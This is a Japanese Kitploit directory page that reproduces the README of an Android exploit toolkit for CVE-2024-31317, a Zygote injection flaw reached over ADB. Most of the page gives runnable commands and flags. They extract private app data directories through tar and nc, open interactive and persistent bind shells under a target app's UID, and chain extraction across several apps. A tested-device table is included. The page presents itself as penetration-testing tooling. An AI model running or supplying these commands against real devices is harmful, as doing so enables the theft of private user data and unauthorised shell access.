Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
zygote-CVE-2024-31317 — これは、CVE-2024-31317を利用して、ADB経由でプライベートアプリデータを抽出したり、アプリのUIDでシェルを起動したりするツールキットです。 | Kitploit
ツール/GitHubGitHub/vnescape/zygote-cve-2024-31317
Androidセキュリティ脆弱性分析エクスプロイトデータ流出ペネトレーションテストモバイルセキュリティ
GitHubvnescape/zygote-cve-2024-31317

zygote-CVE-2024-31317

これは、CVE-2024-31317を利用して、ADB経由でプライベートアプリデータを抽出したり、アプリのUIDでシェルを起動したりするツールキットです。

リポジトリを見る
312ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Zygote Toolkit - CVE-2024-31317

これは、CVE-2024-31317 を利用して ADB 経由でプライベートアプリデータを抽出したり、アプリの UID でシェルを起動するツールキットです。この脆弱性は、セキュリティパッチレベル 2024-06-01 以下の Android 9 から 14 に影響します。テスト済みデバイスのサポートマトリックスは以下を参照してください。

前提条件

Debian/Ubuntu (システムパッケージ)

root@kitploit:~
sudo apt update
sudo apt install adb openjdk-17-jdk-headless android-sdk android-sdk-build-tools
export ANDROID_HOME=/usr/lib/android-sdk
export PATH=$PATH:$ANDROID_HOME/build-tools/34.0.0:$ANDROID_HOME/platform-tools

export 行を ~/.bashrc(または同等のもの)に追加して永続化してください。

確認

root@kitploit:~
./setup.sh

クイックスタート

root@kitploit:~
# キャリア APK のビルドとインストール(ソースから自動ビルド)
python3 cve_2024_31317.py com.google.android.youtube --setup --rebuild -y

# アプリのデータディレクトリを抽出
python3 cve_2024_31317.py -d DEVICE_SERIAL -E -o app_data.tar -y com.example.app

エクスプロイトは初回実行時に Hijack.java と AndroidManifest.xml からすべてをビルドします。

使用法

root@kitploit:~
python3 cve_2024_31317.py [flags] [package]

モード

オプション

例

root@kitploit:~
# 抽出
python3 cve_2024_31317.py -d DEVICE -E -o youtube.tar -y com.google.android.youtube

# デバイスが脆弱か確認
python3 cve_2024_31317.py -d DEVICE --check-vuln

# インタラクティブなバインドシェル
python3 cve_2024_31317.py -d DEVICE -i -y com.google.android.youtube

# ポート 7777 で永続シェル
python3 cve_2024_31317.py -d DEVICE -S 7777 -y com.google.android.youtube

# マルチアプライチェーン
python3 cve_2024_31317.py -d DEVICE -E -y --chain-targets "app1,app2,app3"

# リカバリのみ(ブートループ修正)
python3 cve_2024_31317.py -d DEVICE --recover

ソースからのビルド

すべて実行時にソースからビルドされます。ビルドパイプラインは javac(JDK 17+)、d8、aapt、zipalign、apksigner(Android SDK から)を使用します。

  • x86_64 → arm64: ツールはネイティブで実行。DEX 出力はアーキテクチャ非依存
  • ARM64 → arm64: すべてネイティブで実行(Adoptium が ARM64 JDK ビルドを提供)

パスコード

デバイスにパスコードがある場合、BFU(初回ロック解除前)の状態になります。エクスプロイトは最大 5 分間 sys.user.0.ce_available をポーリングし、ロック解除を待ちます。エクスプロイトの間はパスコードを解除することを推奨します。

テスト済みデバイス

† Samsung One UI 固有: ZNJECT インジェクションは成功し、-E 抽出は機能しますが、toybox nc ServerSocket バインドシェルは開きません。問題の根本原因を調査するにはさらなる研究が必要です。

リカバリ

hidden_api_blacklist_exemptions に残ったペイロードは、次回起動時にブートループを引き起こす可能性があります。リセットするには --recover を実行してください:

root@kitploit:~
python3 cve_2024_31317.py -d DEVICE --recover
ツールをダウンロード
フラグ説明
-E孫プロセス tar | nc 経由でアプリデータを抽出(親プロセスが強制終了されても継続)
-iインタラクティブなバインドシェル REPL
-S PORT永続シェル(FIFO シングルポートプロトコル)
--recover設定をリセットし、ブートハング / Zygote の劣化を修正
--setupキャリア APK のビルド + インストールのみ(インジェクションなし)
--list-appsインストール済みパッケージを UID とシステム/ユーザータイプとともに一覧表示
--check-vulnデバイスが CVE-2024-31317 に対して脆弱かどうかを確認して終了
フラグ説明
-o file.tar抽出 tarball の出力パス
-y / --yes確認プロンプトをスキップ
--retries Nターゲットあたりの最大リトライ回数(デフォルト 3)
--chain-targets "pkg1,pkg2"1 回のセッションで複数のアプリを抽出
--chain-file file.json上記と同じ、JSON ファイルから
--reboot-after抽出後に再起動(Zygote を復元)
--reboot-every NN 個のチェーンターゲットごとに再起動
--coldウォームアップをスキップし、次回のアプリ起動時にペイロードを保存
--port PORTバインドシェルポート(デフォルト 8888)
-d SERIAL特定のデバイスをターゲット(複数接続時)
--rebuildキャリア APK の再ビルドを強制
デバイスAndroidAPIパッチABI-E-i-S--chain--cold--retries--recover--reboot-after--list-apps--check-vulnスコア
Google Pixel 312312021-10-05arm64-v8a✅✅✅✅✅✅✅✅✅✅12/12
Samsung SM-P615 Tab S6 Lite13332024-05-01arm64-v8a✅❌†❌†✅✅❌†✅✅✅✅9/12
sdk_gphone_x86_64 (エミュレータ)10292019-09-05x86_64✅✅✅✅✅✅✅✅✅✅12/12